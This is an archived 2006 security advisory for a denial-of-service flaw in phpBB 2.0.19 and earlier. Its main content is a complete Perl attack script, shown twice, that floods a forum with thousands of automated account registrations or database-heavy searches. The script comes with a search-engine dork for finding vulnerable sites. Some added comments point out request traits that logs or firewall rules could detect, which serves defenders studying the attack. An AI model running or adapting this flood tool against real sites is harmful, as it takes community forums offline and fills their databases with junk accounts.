HYSA-2006-001.txt

2006-01-26T00:00:00
ID PACKETSTORM:43399
Type packetstorm
Reporter h4cky0u
Modified 2006-01-26T00:00:00

Description

                                        
                                            `------=_Part_22785_23101671.1138200225311  
Content-Type: text/plain; charset=ISO-8859-1  
Content-Transfer-Encoding: quoted-printable  
Content-Disposition: inline  
  
------------------------------------------------------  
HYSA-2006-001 h4cky0u.org Advisory 010  
------------------------------------------------------  
Date - Wed Jan 25 2006  
  
  
TITLE:  
=3D=3D=3D=3D=3D=3D  
  
phpBB 2.0.19 search.php and profile.php DOS Vulnerability  
  
  
SEVERITY:  
=3D=3D=3D=3D=3D=3D=3D=3D=3D  
  
High  
  
  
SOFTWARE:  
=3D=3D=3D=3D=3D=3D=3D=3D=3D  
  
phpBB 2.0.19 and prior  
  
  
INFO:  
=3D=3D=3D=3D=3D  
  
phpBB is a high powered, fully scalable, and highly customizable  
Open Source bulletin board package. phpBB has a user-friendly  
interface, simple and straightforward administration panel, and  
helpful FAQ. Based on the powerful PHP server language and your  
choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers,  
phpBB is the ideal free community solution for all web sites.  
  
Support Website : http://www.phpbb.com  
  
  
BUG DESCRIPTION:  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D  
  
The bug was originally found by HaCkZaTaN of NeoSecurityteam. The  
original exploit code can be found at -  
  
http://h4cky0u.org/viewtopic.php?t=3D637  
  
This one affected only versions up to phpBB 2.0.15. The exploit code  
has been recoded so that it also affects the latest version. The bug resides  
in the following two scripts:  
  
profile.php << by registering as many users as possible.  
search.php << by submitting searches in a form the database cannot handle.  
  
  
Proof Of Concept Code:  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D  
  
#!/usr/bin/perl  
#######################################  
## Recoded by: mix2mix and Elioni of http://ahg-khf.org  
## And h4cky0u Security Forums (http://h4cky0u.org)  
## Name: phpBBDoSReloaded  
## Original Author: HaCkZaTaN of Neo Security Team  
## Tested on phpBB 2.0.19 and earlier versions  
## Ported to perl by g30rg3_x  
## Date: 25/01/06  
#######################################  
## NOTE(review): this listing is reproduced exactly as published, still in the  
## quoted-printable transfer encoding declared by the enclosing MIME part  
## (Content-Transfer-Encoding: quoted-printable), so it is not valid Perl as  
## shown. It has no `use strict`/`use warnings` and uses the indirect-object  
## form `new IO::Socket::INET`. The request traits it hard-codes (see the  
## comments on each loop) are what a server log or WAF rule would key on.  
use IO::Socket;  
  
## Loop counter shared by both flood modes; each mode runs it up to 9999.  
$x =3D 0;  
  
print q(  
phpBBDosReloaded - Originally NsT-phpBB DoS by HaCkZaTaN  
Recoded by Albanian Hackers Group &  
h4cky0u Security Forums=09  
  
);  
print q(Host |without-> http://www.| );  
$host =3D <STDIN>;  
chop ($host);  
  
print q(Path |example-> /phpBB2/ or /| );  
$pth =3D <STDIN>;  
chop ($pth);  
  
## The prompt itself states the mitigation split: with visual confirmation  
## (CAPTCHA) enabled on registration, mode 1 is not usable and the tool falls  
## back to mode 2 (search flood), which the advisory lists no fix for.  
print q(Flood Type |1 =3D If Visual Confirmation is disabled, 2 =3D If  
Visual Confirmation is enabled| );  
$type =3D <STDIN>;  
chop ($type);  
  
## Mode 1: registration flood (original comment in Albanian: "type for registration").  
if($type =3D=3D 1){  
  
## User Loop for 9999 loops (enough for Flood xDDDD)  
while($x !=3D 9999)  
{  
  
## Username registered on this iteration, numbered by $x (original comment in  
## Albanian). Detection: accounts named AHG__<n> with sequential n.  
$uname =3D "username=3DAHG__" . "$x";  
  
## E-mail stored for that account, same AHG__<n> prefix on a fixed domain  
## (original comment in Albanian).  
$umail =3D "&email=3DAHG__" . "$x";  
  
$postit =3D "$uname"."$umail"."%40ahg-crew.org&new_password=3D0123456&passw=  
ord_confirm=3D0123456&icq=3D&aim=3DN%2FA&msn=3D&yim=3D&website=3D&location=  
=3D&occupation=3D&interests=3D&signature=3D&viewemail=3D0&hideonline=3D0&no=  
tifyreply=3D0&notifypm=3D1&popup_pm=3D1&attachsig=3D1&allowbbcode=3D1&allow=  
html=3D0&allowsmilies=3D1&language=3Denglish&style=3D2&timezone=3D0&datefor=  
mat=3DD+M+d%2C+Y+g%3Ai+a&mode=3Dregister&agreed=3Dtrue&coppa=3D0&submit=3DS=  
ubmit";  
  
## Body length for the Content-Length header.  
$lrg =3D length $postit;  
  
## One fresh TCP connection per request; closed right after the POST even  
## though the request asks for Keep-Alive.  
my $sock =3D new IO::Socket::INET (  
PeerAddr =3D> "$host",  
PeerPort =3D> "80",  
Proto =3D> "tcp",  
);  
## Aborts when the connection fails (message in Albanian: cannot connect,  
## host may be DoSed or does not exist).  
die "\nNuk mundem te lidhemi me hostin sepse =EBsht dosirat ose nuk  
egziston: $!\n" unless $sock;  
  
## Send the registration POST to profile.php. Fixed traits worth alerting on:  
## "Referer: <bare host>" (not a URL) and the BeOS Firefox/1.0.4 User-Agent.  
print $sock "POST $pth"."profile.php HTTP/1.1\n";  
print $sock "Host: $host\n";  
print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg,  
image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel,  
application/vnd.ms-powerpoint, application/msword, */*\n";  
print $sock "Referer: $host\n";  
print $sock "Accept-Language: en-us\n";  
print $sock "Content-Type: application/x-www-form-urlencoded\n";  
print $sock "Accept-Encoding: gzip, deflate\n";  
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US;  
rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";  
print $sock "Connection: Keep-Alive\n";  
print $sock "Cache-Control: no-cache\n";  
print $sock "Content-Length: $lrg\n\n";  
print $sock "$postit\n";  
close($sock);  
  
## Print a "+" for every loop  
syswrite STDOUT, "+";  
  
$x++;  
}  
  
## Mode 2: search flood (original comment in Albanian: "type 2 for search (flood)").  
}  
elsif ($type =3D=3D 2){  
  
while($x !=3D 9999)  
{  
## Search query POSTed on this iteration; $x makes every query distinct so no  
## cached result is reused. Detection: search_keywords containing  
## "Albanian Hackers Group Proof of Concept <n>" across all forums (-1).  
$postit =3D "search_keywords=3DAlbanian+Hackers+Group+Proof+of+Concept+$x+&=  
search_terms=3Dany&search_author=3D&search_forum=3D-1&search_time=3D0&searc=  
h_fields=3Dmsgonly&search_cat=3D-1&sort_by=3D0&sort_dir=3DASC&show_results=  
=3Dposts&return_chars=3D200";  
  
## Body length for the Content-Length header.  
$lrg =3D length $postit;  
  
## One fresh TCP connection per request, as in mode 1.  
my $sock =3D new IO::Socket::INET (  
PeerAddr =3D> "$host",  
PeerPort =3D> "80",  
Proto =3D> "tcp",  
);  
die "\nThe Socket Can't Connect To The Desired Host or the Host is  
MayBe DoSed: $!\n" unless $sock;  
  
## Send the search POST to search.php?mode=results. Same fixed Referer and  
## User-Agent traits as mode 1; only the Accept header differs.  
print $sock "POST $pth"."search.php?mode=3Dresults HTTP/1.1\n";  
print $sock "Host: $host\n";  
print $sock "Accept:  
text/xml,application/xml,application/xhtml+xml,text/html;q=3D0.9,text/plain=  
;q=3D0.8,image/png,*/*;q=3D0.5\n";  
print $sock "Referer: $host\n";  
print $sock "Accept-Language: en-us\n";  
print $sock "Content-Type: application/x-www-form-urlencoded\n";  
print $sock "Accept-Encoding: gzip, deflate\n";  
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US;  
rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";  
print $sock "Connection: Keep-Alive\n";  
print $sock "Cache-Control: no-cache\n";  
print $sock "Content-Length: $lrg\n\n";  
print $sock "$postit\n";  
close($sock);  
  
## Print a "+" for every loop  
syswrite STDOUT, "+";  
  
## Increment X in One for every Loop  
$x++;  
}  
}else{  
## Any other mode value aborts (original comment in Albanian: "what did you  
## type?"; the die message means "option not allowed").  
die "Mund=EBsia nuk Lejohet +_-???\n";  
}  
  
  
FIX:  
=3D=3D=3D=3D  
  
No fix was available at the time of publication.  
  
  
GOOGLEDORK:  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D  
  
"Powered by phpBB"  
  
  
CREDITS:  
=3D=3D=3D=3D=3D=3D=3D=3D  
  
- This vulnerability was discovered and researched by HaCkZaTaN of  
NeoSecurityteam.  
  
  
- Exploit recoded by mix2mix of [AHG-KHF] Security Team for the latest  
release of the script -  
  
Web : http://ahg-khf.org  
  
mail : webmaster at ahg-khf dot org  
  
  
- Co Researcher -  
  
h4cky0u of h4cky0u Security Forums.  
  
mail : h4cky0u at gmail dot com  
  
web : http://www.h4cky0u.org  
  
  
ORIGINAL ADVISORY:  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D  
  
http://www.h4cky0u.org/advisories/HYSA-2006-001-phpbb.txt  
  
--  
http://www.h4cky0u.org  
(In)Security at its best...  
  
------=_Part_22785_23101671.1138200225311  
Content-Type: text/html; charset=ISO-8859-1  
Content-Transfer-Encoding: quoted-printable  
Content-Disposition: inline  
  
<pre>------------------------------------------------------<br> HYSA-2=  
006-001 <a href=3D"http://h4cky0u.org">h4cky0u.org</a> Advisory 010<br>----=  
--------------------------------------------------<br>Date - Wed Jan 25 200=  
6  
<br><br><br>TITLE:<br>=3D=3D=3D=3D=3D=3D<br><br>phpBB 2.0.19 search.php and=  
profile.php DOS Vulnerability<br><br><br>SEVERITY:<br>=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D<br><br>High<br><br><br>SOFTWARE:<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D<b=  
r><br>phpBB 2.0.19 and prior<br><br><br>INFO:<br>  
=3D=3D=3D=3D=3D<br><br>phpBB is a high powered, fully scalable, and highly =  
customizable <br>Open Source bulletin board package. phpBB has a user-frien=  
dly <br>interface, simple and straightforward administration panel, and <br=  
>helpful FAQ. Based on the powerful PHP server language and your=20  
<br>choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, <b=  
r>phpBB is the ideal free community solution for all web sites.<br><br>Supp=  
ort Website : <a href=3D"http://www.phpbb.com">http://www.phpbb.com</a><br>  
<br><br>BUG DESCRIPTION:<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D<br><br>The bug was originally found by HaCkZaTaN of NeoSecurityteam. Th=  
e original exploit code can be found at -<br><br><a href=3D"http://h4cky0u.=  
org/viewtopic.php?t=3D637">http://h4cky0u.org/viewtopic.php?t=3D637  
</a><br><br>This one affected only versions uptill phpBB 2.0.15. The exploi=  
t code has been recoded which affects the latest version too. The bug resid=  
es in the following two scripts-<br><br>profile.php << By registering=  
as many users as you can.=20  
<br>search.php << By searching in a way that the db cannot understan=  
d.<br><br><br>Proof Of Concept Code:<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br><br>#!/usr/bin/perl <br>##############=  
######################### <br>## Recoded by: mix2mix and Elioni of=20  
<a href=3D"http://ahg-khf.org">http://ahg-khf.org</a><br>## And h4cky0u S=  
ecurity Forums (<a href=3D"http://h4cky0u.org">http://h4cky0u.org</a>) <br>=  
## Name: phpBBDoSReloaded<br>## Original Author: HaCkZaTaN of Neo Secur=  
ity Team=20  
<br>## Tested on phpBB 2.0.19 and earlier versions<br>## Ported to perl=  
by g30rg3_x<br>## Date: 25/01/06<br>####################################=  
### <br>use IO::Socket; <br><br>## Initialized X <br>$x =3D 0; <br><br>prin=  
t q(  
<br> phpBBDosReloaded - Originally NsT-phpBB DoS by HaCkZaTaN<br> Recoded=  
by Albanian Hackers Group &<br> h4cky0u Security Forums=09<br><br>); =  
<br>print q(Host |without-> <a href=3D"http://www.|">http://www.|</a> );=  
=20  
<br>$host =3D <STDIN>; <br>chop ($host); <br><br>print q(Path |exampl=  
e-> /phpBB2/ or /| ); <br>$pth =3D <STDIN>; <br>chop ($pth); <br><=  
br>print q(Flood Type |1 =3D If Visual Confirmation is disabled, 2 =3D If V=  
isual Confirmation is enabled| );=20  
<br>$type =3D <STDIN>; <br>chop ($type); <br><br>## Tipi p=EBr regjis=  
trim <br>if($type =3D=3D 1){ <br><br>## User Loop for 9999 loops (enough fo=  
r Flood xDDDD) <br>while($x !=3D 9999) <br>{ <br><br>## Antari q=EB regjist=  
rohet automatikisht=EB "X"=20  
<br>$uname =3D "username=3DAHG__" . "$x"; <br><br>## Em=  
aili q=EB regjistrohet ne baz=EBn "X" <br>$umail =3D "&e=  
mail=3DAHG__" . "$x"; <br><br>$postit =3D "$uname"=  
."$umail"."%40ahg-  
crew.org&new_password=3D0123456&password_confirm=3D0123456&icq=  
=3D&aim=3DN%2FA&msn=3D&yim=3D&website=3D&location=3D&am=  
p;occupation=3D&interests=3D&signature=3D&viewemail=3D0&hid=  
eonline=3D0&notifyreply=3D0&notifypm=3D1&popup_pm=3D1&attac=  
hsig=3D1&allowbbcode=3D1&allowhtml=3D0&allowsmilies=3D1&lan=  
guage=3Denglish&style=3D2&timezone=3D0&dateformat=3DD+M+d%2C+Y+=  
g%3Ai+a&mode=3Dregister&agreed=3Dtrue&coppa=3D0&submit=3DSu=  
bmit  
"; <br><br>$lrg =3D length $postit; <br><br>my $sock =3D new IO::Socke=  
t::INET ( <br> PeerAddr =3D> "$host=  
", <br> PeerPort =3D> "80&quot=  
;, <br>  
Proto =3D> "tcp", <br> =  
); <br>die "\nNuk mundem te lidhemi me hostin=  
sepse =EBsht dosirat ose nuk egziston: $!\n" unless $sock; <br><br>##=  
Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums=  
=20  
<br>print $sock "POST $pth"."profile.php HTTP/1.1\n"; <=  
br>print $sock "Host: $host\n"; <br>print $sock "Accept: ima=  
ge/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-f=  
lash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/=  
msword, */*\n";=20  
<br>print $sock "Referer: $host\n"; <br>print $sock "Accept-=  
Language: en-us\n"; <br>print $sock "Content-Type: application/x-=  
www-form-urlencoded\n"; <br>print $sock "Accept-Encoding: gzip, d=  
eflate\n";=20  
<br>print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv=  
:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; <br>print $sock "Connect=  
ion: Keep-Alive\n"; <br>print $sock "Cache-Control: no-cache\n&qu=  
ot;;=20  
<br>print $sock "Content-Length: $lrg\n\n"; <br>print $sock &quot=  
;$postit\n"; <br>close($sock); <br><br>## Print a "+" for ev=  
ery loop <br>syswrite STDOUT, "+"; <br><br>$x++; <br>} <br><br>  
## Tipi 2-sh=EB p=EBr K=EBrkim(Flood) <br>} <br>elsif ($type =3D=3D 2){ <br=  
><br>while($x !=3D 9999) <br>{ <br>## Final Search String to Send <br>$post=  
it =3D "search_keywords=3DAlbanian+Hackers+Group+Proof+of+Concept+$x+&=  
amp;search_terms=3Dany&search_author=3D&search_forum=3D-1&searc=  
h_time=3D0&search_fields=3Dmsgonly&search_cat=3D-1&sort_by=3D0&=  
amp;sort_dir=3DASC&show_results=3Dposts&return_chars=3D200";=  
=20  
<br><br>## Posit Length <br>$lrg =3D length $postit; <br><br>## Connect Soc=  
ket with Variables Provided By User <br>my $sock =3D new IO::Socket::INET (=  
<br> PeerAddr =3D> "$host", <=  
br>  
PeerPort =3D> "80", <br> =  
Proto =3D> "tcp", <br> =  
); <br>die "\nThe Socket Can't Connect To The Desi=  
red Host or the Host is MayBe DoSed: $!\n" unless $sock;=20  
<br><br>## Sending Truth Socket The HTTP Commands For Send A BD Search Into=  
phpBB Forums <br>print $sock "POST $pth"."search.php?mode=  
=3Dresults HTTP/1.1\n"; <br>print $sock "Host: $host\n"; <br=  
>  
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,te=  
xt/html;q=3D0.9,text/plain;q=3D0.8,image/png,*/*;q=3D0.5\n"; <br>print=  
$sock "Referer: $host\n"; <br>print $sock "Accept-Language:=  
en-us\n";=20  
<br>print $sock "Content-Type: application/x-www-form-urlencoded\n&quo=  
t;; <br>print $sock "Accept-Encoding: gzip, deflate\n"; <br>print=  
$sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8  
) Gecko/20050511 Firefox/1.0.4\n"; <br>print $sock "Connection: K=  
eep-Alive\n"; <br>print $sock "Cache-Control: no-cache\n"; <=  
br>print $sock "Content-Length: $lrg\n\n"; <br>print $sock "=  
$postit\n";=20  
<br>close($sock); <br><br>## Print a "+" for every loop <br>syswr=  
ite STDOUT, "+"; <br><br>## Increment X in One for every Loop <br=  
>$x++; <br>} <br>}else{ <br>## STF??? Qfar=EB keni Shtypur <br> die &quot=  
;Mund=EBsia nuk Lejohet +_-???\n";=20  
<br>}<br><br><br>FIX:<br>=3D=3D=3D=3D<br><br>No fix available as of date.<b=  
r><br><br>GOOGLEDORK:<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br><br>"Pow=  
ered by phpBB" <br><br><br>CREDITS:<br>=3D=3D=3D=3D=3D=3D=3D=3D<br><br=  
>- This vulnerability was discovered and researched by HaCkZaTaN of NeoSecu=  
rityteam.  
<br><br><br>- Exploit recoded by mix2mix of [AHG-KHF] Security Team for the=  
latest release of the script -<br><br>Web : <a href=3D"http://ahg-khf.org"=  
>http://ahg-khf.org</a><br><br>mail : webmaster at ahg-khf dot org<br><br>  
<br>- Co Researcher -<br><br>h4cky0u of h4cky0u Security Forums.<br><br>mai=  
l : h4cky0u at gmail dot com<br><br>web : <a href=3D"http://www.h4cky0u.org=  
">http://www.h4cky0u.org</a><br><br><br>ORIGINAL ADVISORY:<br>=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D  
<br><br><a href=3D"http://www.h4cky0u.org/advisories/HYSA-2006-001-phpbb.tx=  
t">http://www.h4cky0u.org/advisories/HYSA-2006-001-phpbb.txt</a><br><br></p=  
re>  
-- <br><a href=3D"http://www.h4cky0u.org">http://www.h4cky0u.org</a><br>(In=  
)Security at its best...  
  
------=_Part_22785_23101671.1138200225311--  
`